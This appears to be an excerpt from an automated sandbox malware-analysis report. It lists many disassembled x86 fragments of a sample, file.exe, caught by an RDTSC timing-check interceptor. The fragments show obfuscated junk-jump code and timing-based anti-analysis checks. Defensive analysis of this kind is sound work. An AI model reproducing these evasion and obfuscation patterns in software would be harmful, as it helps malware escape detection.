          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53403E0 second address: 5340403 instructions: 0x00000000 rdtsc 0x00000002 mov cl, bh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FAF74D8F599h 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340403 second address: 534043D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAF74D778E7h 0x00000009 or ch, 0000007Eh 0x0000000c jmp 00007FAF74D778E9h 0x00000011 popfd 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534043D second address: 5340490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 lea eax, dword ptr [ebp-10h] 0x0000000a jmp 00007FAF74D8F58Ch 0x0000000f mov dword ptr fs:[00000000h], eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushfd 0x00000019 jmp 00007FAF74D8F593h 0x0000001e or ecx, 03E2CF3Eh 0x00000024 jmp 00007FAF74D8F599h 0x00000029 popfd 0x0000002a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340490 second address: 53404B7 instructions: 0x00000000 rdtsc 0x00000002 mov si, 5287h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov dword ptr [ebp-18h], esp 0x0000000c jmp 00007FAF74D778DAh 0x00000011 mov eax, dword ptr fs:[00000018h] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov ecx, edi 0x0000001c mov edi, 32739B7Ch 0x00000021 popad 0x00000022 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53404B7 second address: 5340537 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, ah 0x00000005 call 00007FAF74D8F58Dh 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ecx, dword ptr [eax+00000FDCh] 0x00000014 jmp 00007FAF74D8F597h 0x00000019 test ecx, ecx 0x0000001b jmp 00007FAF74D8F596h 0x00000020 jns 00007FAF74D8F5F8h 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FAF74D8F58Dh 0x0000002f sub eax, 11C5AD96h 0x00000035 jmp 00007FAF74D8F591h 0x0000003a popfd 0x0000003b mov esi, 116B2A07h 0x00000040 popad 0x00000041 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340537 second address: 534054F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAF74D778E3h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534054F second address: 534055E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add eax, ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534055E second address: 5340564 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340564 second address: 534056A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534056A second address: 534056E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534056E second address: 5340572 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340572 second address: 53405BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FAF74D778E3h 0x00000012 or ecx, 7C2474DEh 0x00000018 jmp 00007FAF74D778E9h 0x0000001d popfd 0x0000001e popad 0x0000001f test ecx, ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53405BB second address: 53405CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D8F58Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53302D7 second address: 53302F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D778E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53302F4 second address: 53303FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAF74D8F597h 0x00000009 and eax, 4ADF778Eh 0x0000000f jmp 00007FAF74D8F599h 0x00000014 popfd 0x00000015 movzx ecx, bx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push esp 0x0000001c jmp 00007FAF74D8F598h 0x00000021 mov dword ptr [esp], ebp 0x00000024 jmp 00007FAF74D8F590h 0x00000029 mov ebp, esp 0x0000002b pushad 0x0000002c movzx esi, bx 0x0000002f jmp 00007FAF74D8F593h 0x00000034 popad 0x00000035 sub esp, 2Ch 0x00000038 jmp 00007FAF74D8F596h 0x0000003d xchg eax, ebx 0x0000003e jmp 00007FAF74D8F590h 0x00000043 push eax 0x00000044 pushad 0x00000045 movsx edx, cx 0x00000048 pushfd 0x00000049 jmp 00007FAF74D8F58Ah 0x0000004e add ah, 00000058h 0x00000051 jmp 00007FAF74D8F58Bh 0x00000056 popfd 0x00000057 popad 0x00000058 xchg eax, ebx 0x00000059 jmp 00007FAF74D8F596h 0x0000005e xchg eax, edi 0x0000005f pushad 0x00000060 mov bx, cx 0x00000063 jmp 00007FAF74D8F58Ah 0x00000068 popad 0x00000069 push eax 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007FAF74D8F58Eh 0x00000071 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53303FD second address: 533040F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF74D778DEh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 533044A second address: 533044E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 533044E second address: 5330454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330454 second address: 533049D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAF74D8F58Ch 0x00000009 sub esi, 2F486D08h 0x0000000f jmp 00007FAF74D8F58Bh 0x00000014 popfd 0x00000015 call 00007FAF74D8F598h 0x0000001a pop esi 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov ebx, 00000000h 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 533049D second address: 53304A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53304A1 second address: 53304A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53304A5 second address: 53304AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53304AB second address: 533055C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D8F592h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub edi, edi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FAF74D8F597h 0x00000012 jmp 00007FAF74D8F593h 0x00000017 popfd 0x00000018 mov dx, ax 0x0000001b popad 0x0000001c inc ebx 0x0000001d pushad 0x0000001e mov edx, esi 0x00000020 mov di, si 0x00000023 popad 0x00000024 test al, al 0x00000026 jmp 00007FAF74D8F596h 0x0000002b je 00007FAF74D8F714h 0x00000031 jmp 00007FAF74D8F590h 0x00000036 lea ecx, dword ptr [ebp-14h] 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c mov bl, 7Dh 0x0000003e pushfd 0x0000003f jmp 00007FAF74D8F596h 0x00000044 or esi, 75FA8B48h 0x0000004a jmp 00007FAF74D8F58Bh 0x0000004f popfd 0x00000050 popad 0x00000051 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53305F0 second address: 53305F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53305F6 second address: 53305FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53305FC second address: 5330600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 533066A second address: 5330670 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330670 second address: 53306D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [ebp-14h], edi 0x0000000b jmp 00007FAF74D778E9h 0x00000010 jne 00007FAFE54A56DDh 0x00000016 jmp 00007FAF74D778DEh 0x0000001b mov ebx, dword ptr [ebp+08h] 0x0000001e jmp 00007FAF74D778E0h 0x00000023 lea eax, dword ptr [ebp-2Ch] 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FAF74D778E7h 0x0000002d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53306D7 second address: 5330700 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 06A97EAAh 0x00000008 push ebx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FAF74D8F599h 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330700 second address: 5330751 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D778E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c pushad 0x0000000d mov ecx, 044861E3h 0x00000012 push esi 0x00000013 mov ch, bl 0x00000015 pop eax 0x00000016 popad 0x00000017 push edx 0x00000018 pushad 0x00000019 mov ecx, 25908C09h 0x0000001e push esi 0x0000001f jmp 00007FAF74D778E5h 0x00000024 pop ecx 0x00000025 popad 0x00000026 mov dword ptr [esp], eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FAF74D778DAh 0x00000030 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330751 second address: 5330768 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D8F58Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov si, di 0x00000010 popad 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330768 second address: 5330782 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF74D778E6h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330782 second address: 53307AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D8F58Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAF74D8F594h 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330851 second address: 5330020 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edx, 2D8C693Ch 0x0000000b popad 0x0000000c je 00007FAFE54A56CEh 0x00000012 xor eax, eax 0x00000014 jmp 00007FAF74D5100Ah 0x00000019 pop esi 0x0000001a pop edi 0x0000001b pop ebx 0x0000001c leave 0x0000001d retn 0004h 0x00000020 nop 0x00000021 cmp eax, 00000000h 0x00000024 setne cl 0x00000027 xor ebx, ebx 0x00000029 test cl, 00000001h 0x0000002c jne 00007FAF74D778D7h 0x0000002e jmp 00007FAF74D77A4Bh 0x00000033 call 00007FAF79930B75h 0x00000038 mov edi, edi 0x0000003a jmp 00007FAF74D778E7h 0x0000003f xchg eax, ebp 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330020 second address: 5330026 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330026 second address: 5330060 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D778DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov si, dx 0x0000000e push ebx 0x0000000f mov ebx, eax 0x00000011 pop eax 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 jmp 00007FAF74D778DBh 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FAF74D778E0h 0x00000024 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330060 second address: 5330066 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330066 second address: 53300C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D778DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007FAF74D778E0h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov si, F763h 0x00000015 popad 0x00000016 xchg eax, ecx 0x00000017 jmp 00007FAF74D778E6h 0x0000001c mov dword ptr [ebp-04h], 55534552h 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FAF74D778E7h 0x0000002a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53300C7 second address: 53300FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAF74D8F58Fh 0x00000009 adc si, 7F9Eh 0x0000000e jmp 00007FAF74D8F599h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330135 second address: 533013B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 533013B second address: 533013F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 533013F second address: 5330B80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D778E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ret 0x0000000c nop 0x0000000d and bl, 00000001h 0x00000010 movzx eax, bl 0x00000013 lea esp, dword ptr [ebp-0Ch] 0x00000016 pop esi 0x00000017 pop edi 0x00000018 pop ebx 0x00000019 pop ebp 0x0000001a ret 0x0000001b add esp, 04h 0x0000001e jmp dword ptr [0078A41Ch+ebx*4] 0x00000025 push edi 0x00000026 call 00007FAF74D9D2D7h 0x0000002b push ebp 0x0000002c push ebx 0x0000002d push edi 0x0000002e push esi 0x0000002f sub esp, 000001D0h 0x00000035 mov dword ptr [esp+000001B4h], 0078CB10h 0x00000040 mov dword ptr [esp+000001B0h], 000000D0h 0x0000004b mov dword ptr [esp], 00000000h 0x00000052 mov eax, dword ptr [007881DCh] 0x00000057 call eax 0x00000059 mov edi, edi 0x0000005b jmp 00007FAF74D778DBh 0x00000060 xchg eax, ebp 0x00000061 jmp 00007FAF74D778E6h 0x00000066 push eax 0x00000067 jmp 00007FAF74D778DBh 0x0000006c xchg eax, ebp 0x0000006d jmp 00007FAF74D778E6h 0x00000072 mov ebp, esp 0x00000074 push eax 0x00000075 push edx 0x00000076 jmp 00007FAF74D778E7h 0x0000007b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330B80 second address: 5330BD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 movsx edi, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [75AB459Ch], 05h 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FAF74D8F598h 0x00000019 xor si, 0168h 0x0000001e jmp 00007FAF74D8F58Bh 0x00000023 popfd 0x00000024 popad 0x00000025 je 00007FAFE54AD3C7h 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FAF74D8F590h 0x00000032 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330C23 second address: 5330C4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, FCh 0x00000005 call 00007FAF74D778E0h 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e call 00007FAF74D778D9h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330C4B second address: 5330C4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330C4F second address: 5330C55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330C55 second address: 5330CDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 mov bl, F0h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FAF74D8F58Fh 0x00000012 add ecx, 6644A22Eh 0x00000018 jmp 00007FAF74D8F599h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FAF74D8F590h 0x00000024 and cx, 3FA8h 0x00000029 jmp 00007FAF74D8F58Bh 0x0000002e popfd 0x0000002f popad 0x00000030 mov eax, dword ptr [esp+04h] 0x00000034 pushad 0x00000035 movsx ebx, ax 0x00000038 pushad 0x00000039 jmp 00007FAF74D8F58Eh 0x0000003e mov ecx, 23806DA1h 0x00000043 popad 0x00000044 popad 0x00000045 mov eax, dword ptr [eax] 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330CDA second address: 5330CDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330CDE second address: 5330CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330CE4 second address: 5330D4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 mov ebx, 1D15EB50h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FAF74D778E4h 0x00000019 or si, 2798h 0x0000001e jmp 00007FAF74D778DBh 0x00000023 popfd 0x00000024 jmp 00007FAF74D778E8h 0x00000029 popad 0x0000002a pop eax 0x0000002b jmp 00007FAF74D778E0h 0x00000030 call 00007FAFE549C701h 0x00000035 push 75A52B70h 0x0000003a push dword ptr fs:[00000000h] 0x00000041 mov eax, dword ptr [esp+10h] 0x00000045 mov dword ptr [esp+10h], ebp 0x00000049 lea ebp, dword ptr [esp+10h] 0x0000004d sub esp, eax 0x0000004f push ebx 0x00000050 push esi 0x00000051 push edi 0x00000052 mov eax, dword ptr [75AB4538h] 0x00000057 xor dword ptr [ebp-04h], eax 0x0000005a xor eax, ebp 0x0000005c push eax 0x0000005d mov dword ptr [ebp-18h], esp 0x00000060 push dword ptr [ebp-08h] 0x00000063 mov eax, dword ptr [ebp-04h] 0x00000066 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000006d mov dword ptr [ebp-08h], eax 0x00000070 lea eax, dword ptr [ebp-10h] 0x00000073 mov dword ptr fs:[00000000h], eax 0x00000079 ret 0x0000007a pushad 0x0000007b push eax 0x0000007c push edx 0x0000007d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330D4F second address: 5330D5C instructions: 0x00000000 rdtsc 0x00000002 mov cx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 mov bx, 2C58h 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350688 second address: 535068E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535068E second address: 53506C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAF74D8F58Fh 0x00000008 call 00007FAF74D8F598h 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53506C3 second address: 53506C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53506C7 second address: 53506CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53506CB second address: 53506D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53506D1 second address: 5350747 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D8F592h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007FAF74D8F590h 0x00000011 mov ebp, esp 0x00000013 jmp 00007FAF74D8F590h 0x00000018 xchg eax, esi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FAF74D8F58Dh 0x00000022 xor ax, B1C6h 0x00000027 jmp 00007FAF74D8F591h 0x0000002c popfd 0x0000002d call 00007FAF74D8F590h 0x00000032 pop eax 0x00000033 popad 0x00000034 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350747 second address: 5350762 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF74D778E7h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350762 second address: 5350785 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D8F599h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350785 second address: 5350877 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, esi 0x00000006 pushad 0x00000007 pushfd 0x00000008 jmp 00007FAF74D778E7h 0x0000000d or eax, 78A4886Eh 0x00000013 jmp 00007FAF74D778E9h 0x00000018 popfd 0x00000019 pushfd 0x0000001a jmp 00007FAF74D778E0h 0x0000001f adc si, 13E8h 0x00000024 jmp 00007FAF74D778DBh 0x00000029 popfd 0x0000002a popad 0x0000002b mov esi, dword ptr [ebp+0Ch] 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007FAF74D778E4h 0x00000035 or esi, 1F93A648h 0x0000003b jmp 00007FAF74D778DBh 0x00000040 popfd 0x00000041 push eax 0x00000042 jmp 00007FAF74D778DFh 0x00000047 pop ecx 0x00000048 popad 0x00000049 test esi, esi 0x0000004b jmp 00007FAF74D778DFh 0x00000050 je 00007FAFE5475458h 0x00000056 pushad 0x00000057 pushfd 0x00000058 jmp 00007FAF74D778E4h 0x0000005d jmp 00007FAF74D778E5h 0x00000062 popfd 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007FAF74D778DEh 0x0000006a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350877 second address: 53508B0 instructions: 0x00000000 rdtsc 0x00000002 mov edx, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 cmp dword ptr [75AB459Ch], 05h 0x0000000e jmp 00007FAF74D8F58Ch 0x00000013 je 00007FAFE54A518Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FAF74D8F597h 0x00000020 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350962 second address: 5350998 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D778E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007FAF74D778DAh 0x00000013 or esi, 237D2E08h 0x00000019 jmp 00007FAF74D778DBh 0x0000001e popfd 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350998 second address: 53509BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, esi 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 mov dx, 3C02h 0x0000000d mov eax, edi 0x0000000f popad 0x00000010 xchg eax, esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FAF74D8F590h 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53509BB second address: 53509C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53509C1 second address: 53509C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
